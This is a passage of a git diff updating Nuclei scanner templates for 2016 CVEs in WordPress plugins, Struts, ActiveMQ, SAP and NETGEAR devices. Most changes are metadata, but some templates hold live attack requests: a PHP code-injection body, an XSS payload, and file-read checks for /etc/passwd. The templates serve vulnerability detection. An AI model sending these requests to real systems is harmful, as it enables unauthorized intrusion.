vulnerability. reference: - https://wordpress.org/plugins/simpel-reserveren - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 - - http://web.archive.org/web/20210125181834/https://www.securityfocus.com/bid/93582/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000149 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: simpel-reserveren_project + product: simpel-reserveren + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a004630440220566c98d1ee8b52f9c0c0a0d778cff7d722f5d55e7c73507ccf2cc52d172c71da0220411fdc626d91c0ba00307bedb3c274ef1c434723376ac3cf4909e5f9571b6d0e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 3abffcc305..8dda5a9670 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 - https://wordpress.org/plugins/tidio-form - - http://web.archive.org/web/20210125181732/https://www.securityfocus.com/bid/93579/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000152 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00353 + epss-percentile: 0.68829 + cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: tidio-form_project + product: tidio-form + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402205b0e2aa9772cf92c523e76a51b62e424c19239208b3a060c42f64db667b7de2e0220770b2acad2106b2451d7b712e6469a0cd202c81691e6e08f0096b8a47260c762:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 2f906a05b1..5dd9eac159 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Tidio Gallery plugin (1.1 or higher) to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 - https://wordpress.org/plugins/tidio-gallery - - http://web.archive.org/web/20210123180207/https://www.securityfocus.com/bid/93543/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00142 + epss-percentile: 0.49783 + cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: tidio-gallery_project + product: tidio-gallery + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a004630440220683987963ed4415afe656cd6c11b12aff9ad199ae476b5aa703a9ee6de57c87002201d68bff31918f4f2059137530007e4ebe0d7a5e5a3b8590650ddffa2633e3202:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index cad2fb059e..725e3b8c23 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - https://wordpress.org/plugins/whizz - - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000154 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00142 + epss-percentile: 0.49634 + cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: browserweb + product: whizz + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402205d0e1beee206fefb260f3d64065db3829cb77ebd88e9949f631520cd2b0e6401022017f092298b153989ad5cce34faa46b3f63dc9aef28765218e3ab4c5f2041d956:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 618e11b631..7271963d5b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WPSOLR plugin (8.7 or higher). reference: - https://wordpress.org/plugins/wpsolr-search-engine - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 - - http://web.archive.org/web/20210123180137/https://www.securityfocus.com/bid/93536/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000155 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00103 + epss-percentile: 0.41607 + cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: wpsolr + product: wpsolr-search-engine + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a00473045022100cddf024b570950b423c7958e7034d061c94728118d0c24834f55503be10fc92d0220433f35713aa01c5994ba129bdcb0f548961a532ca0600d563ec268794381cb8c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 4af6f2c8ce..11f9ef7bea 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -5,20 +5,27 @@ info: author: princechaddha severity: critical description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + remediation: | + Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability. reference: - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 - https://www.exploit-db.com/exploits/40970/ - https://www.exploit-db.com/exploits/40968/ + - http://seclists.org/fulldisclosure/2016/Dec/78 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-10033 cwe-id: CWE-77 - epss-score: 0.97459 - tags: cve,cve2016,rce,edb,wordpress + epss-score: 0.97464 + epss-percentile: 0.99952 + cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: phpmailer_project + product: phpmailer + tags: seclists,cve,cve2016,rce,edb,wordpress http: - raw: @@ -36,24 +43,25 @@ http: wp-submit=Get+New+Password&redirect_to=&user_login={{username}} unsafe: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?")' condition: and -# Enhanced by mp on 2022/04/12 +# digest: 4a0a00473045022100900160d19a4d226bd61f506f2a4dbbd37de391242379fc7ceff83b21721a912002200fd5fdb59e882cb9c491cfeefcf947c7adc7188cb16472678e6e9de5b2d3dd7c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 4f8b27fe18..767633862b 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,0x240x23elu severity: high description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php. + remediation: | + Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability. reference: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 @@ -15,10 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 - cpe: cpe:2.3:a:mail-masta_project:mail-masta:*:*:*:*:*:*:*:* - epss-score: 0.01011 + epss-score: 0.01913 + epss-percentile: 0.87265 + cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 + vendor: mail-masta_project + product: mail-masta + framework: wordpress google-query: inurl:"/wp-content/plugins/mail-masta" tags: cve,cve2016,wordpress,wp-plugin,lfi,mail @@ -31,12 +37,13 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 - 500 -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022100d884aa58b1b20613d6846064ec746fa079da341173544e4ed745bf87c1879c710220624955783789d0c3e39fa7f0708fb0dae1c7773e48d6f08b0ebe1d26e4f4cd81:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index f3bbe803d0..1d7f727813 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + remediation: | + Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ @@ -15,28 +17,36 @@ info: cvss-score: 8.8 cve-id: CVE-2016-10960 cwe-id: CWE-20 - cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:*:*:*:* - epss-score: 0.01389 + epss-score: 0.01127 + epss-percentile: 0.8305 + cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 + vendor: joomlaserviceprovider + product: wsecure + framework: wordpress google-query: inurl:"/wp-content/plugins/wsecure" tags: cve,cve2016,wordpress,wp-plugin,rce +variables: + name: "{{to_lower(rand_text_alpha(5))}}" http: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' + + body: 'wsecure_action=update&publish=";} header("{{name}}: CVE-2016-10960"); class WSecureConfig2 {var $test="' matchers-condition: and matchers: - type: word - words: - - "Nuclei: CVE-2016-10960" - condition: and part: header + words: + - "{{name}}: CVE-2016-10960" + condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/04/12 +# digest: 490a0046304402203d3ccf5761bba9caaaac617461fecf59b8062aead63dbf03f3422c038d8ae36402205912eae31d21985ccc41db030e21a89ead702f32fc346f9c7d5b102442c2e0af:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml new file mode 100644 index 0000000000..86db7e5423 --- /dev/null +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -0,0 +1,52 @@ +id: CVE-2016-10973 + +info: + name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting + author: Harsh + severity: medium + description: | + The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + remediation: | + Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd + - https://nvd.nist.gov/vuln/detail/CVE-2026-10973 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-10973 + cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54723 + cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: brafton + product: brafton + framework: wordpress + tags: wpscan,cve,cve2016,wordpress,wp,wp-plugin,xss,brafton,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "tab = alert(document.domain);")' + - 'contains(body_2, "Brafton Article Loader")' + condition: and + +# digest: 490a0046304402205dccb37f21b06c1219646ede4d69b34ca036f486305602123110e3390d8c384302207e492b038686e5714ccd052799650da456301dec93f1190d7e1808a31a25d485:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index e88a1400e8..e0b3e95307 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://wpvulndb.com/vulnerabilities/8431 @@ -14,11 +16,15 @@ info: cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 - cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:*:*:* - epss-score: 0.00257 - tags: cve,cve2016,wordpress,wp-theme,xss + epss-score: 0.00245 + epss-percentile: 0.62291 + cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: scoreme_project + product: scoreme + framework: wordpress + tags: cve,cve2016,wordpress,wp-theme,xss http: - method: GET @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100eeaafa830c856a3f1b17ac0406d7eb3e83d484a73eb2686e6a9708bac616d93f02210086e666b24201fcae8e011e58318518901d4a87f71d3120bdb97546b4564b7612:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index e59066dd4e..f449f56f09 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -5,19 +5,27 @@ info: author: gy741 severity: critical description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic - http://seclists.org/fulldisclosure/2016/Feb/112 + - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - tags: netgear,rce,oast,router,kev,seclists,cve,cve2016 + epss-score: 0.97375 + epss-percentile: 0.99874 + cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: wnap320_firmware + tags: seclists,packetstorm,netgear,rce,oast,router,kev,cve,cve2016 http: - raw: @@ -31,8 +39,8 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# Enhanced by mp on 2022/05/10 +# digest: 4b0a00483046022100a02b1b719e30ba585abf922181ccb1bf7b5634a37a642615581795438cf35d6402210088cb4cbf0d65a71bed882908a3747dea31dd08aaf0dc8b079469907978be721d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index a18523d3f2..4886542deb 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -5,20 +5,28 @@ info: author: daffainfo severity: high description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978. + remediation: | + Apply the latest security patches and updates provided by SAP to mitigate the vulnerability. reference: - https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html - https://www.exploit-db.com/exploits/39837/ - https://nvd.nist.gov/vuln/detail/CVE-2016-2389 + - http://seclists.org/fulldisclosure/2016/May/40 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-2389 cwe-id: CWE-22 + epss-score: 0.24589 + epss-percentile: 0.96097 + cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: netweaver shodan-query: http.favicon.hash:-266008933 - tags: lfi,sap,packetstorm,edb,cve,cve2016 + tags: packetstorm,seclists,lfi,sap,edb,cve,cve2016 http: - method: GET @@ -27,7 +35,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 +# digest: 4a0a004730450220181d3ec790f65ea7d96e51aa819a615abcda731d8134763e62e94ab10b310123022100ea38d841a01b030afa6335ea9a987342bf31991d7dfd5a0cdace99dd5fa74180:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index b376316f88..cf3e5cb159 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -6,19 +6,27 @@ info: severity: high description: | Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions). + remediation: | + Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1. reference: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html - https://nvd.nist.gov/vuln/detail/CVE-2016-3081 - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665 + - http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2016-3081 cwe-id: CWE-77 - tags: cve,cve2016,struts,rce,apache + epss-score: 0.97524 + epss-percentile: 0.99987 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2016,struts,rce,apache http: - raw: @@ -28,11 +36,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/06/09 + - type: status + status: + - 200 + +# digest: 490a004630440220119413715d37dd26cc2a2a5df36f6e0289b3e45c533126ab4ba3188c801894a9022028bf43021dd3c80a28af3279ca02e7fd565fa444681941cc1dce36ac46607596:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 70a549181f..66f0d8993c 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -5,20 +5,27 @@ info: author: fq_hsu severity: critical description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application. + remediation: | + Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/40857 - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 + - http://rhn.redhat.com/errata/RHSA-2016-2036.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3088 cwe-id: CWE-20 - tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive + epss-score: 0.83955 + epss-percentile: 0.98117 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: apache + product: activemq + tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' @@ -29,7 +36,6 @@ http: Host: {{Hostname}} {{rand1}} - - | GET /fileserver/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} @@ -42,3 +48,5 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and + +# digest: 4a0a0047304502206aea9a6312f7350b9af23efa2ba3b11d355c4ff96476a8e954f17c23a8b61cb6022100ad2528b163147897d5863d13c74b6bc7c213a9ffe8823cef8410750b041583a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index d96f05a55b..fba12edb65 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -5,18 +5,26 @@ info: author: 0x_Akoko severity: medium description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." + remediation: | + Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. reference: - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - http://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.securitytracker.com/id/1035332 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-3978 cwe-id: CWE-79 - tags: cve2016,redirect,fortinet,fortios,seclists,cve + epss-score: 0.00217 + epss-percentile: 0.59514 + cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fortinet + product: fortios + tags: cve2016,redirect,fortinet,fortios,seclists,cve http: - method: GET @@ -29,4 +37,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a00473045022100a43e8ad211e76102490f649223d49bd7a0553f1c4040a3a9929f9de4f48272ee02202d4bb2eaea0e415bb7cddb8b17b147950a409dfa133a002e622fe444212a8f4c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 56da989e55..e135c5bbb2 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -6,20 +6,26 @@ info: severity: high description: | Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter. + remediation: | + Upgrade to a patched version of Apache Shiro reference: - https://github.com/Medicean/VulApps/tree/master/s/shiro/1 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437 - http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html - http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html + - http://rhn.redhat.com/errata/RHSA-2016-2035.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2016-4437 cwe-id: CWE-284 + epss-score: 0.97507 + epss-percentile: 0.99978 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* - epss-score: 0.9748 metadata: max-request: 1 + vendor: apache + product: shiro tags: cve,apache,rce,kev,packetstorm,cve2016,shiro,deserialization,oast http: @@ -35,3 +41,5 @@ http: part: interactsh_protocol words: - dns + +# digest: 490a00463044022050331d9c4524ce6efab826e18a7bd1adf137d31fb3d1599465f98a8c29f5c49302207f67d01a910b9a70b0c77abfdf49941812ffbe7b3af07160113de70cdb4b38a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 3acb26e141..ce44f227eb 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -5,27 +5,36 @@ info: author: melbadry9,nadino,xElkomy severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 - remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. + - https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E + - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E + - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E classification: cvss-metrics: 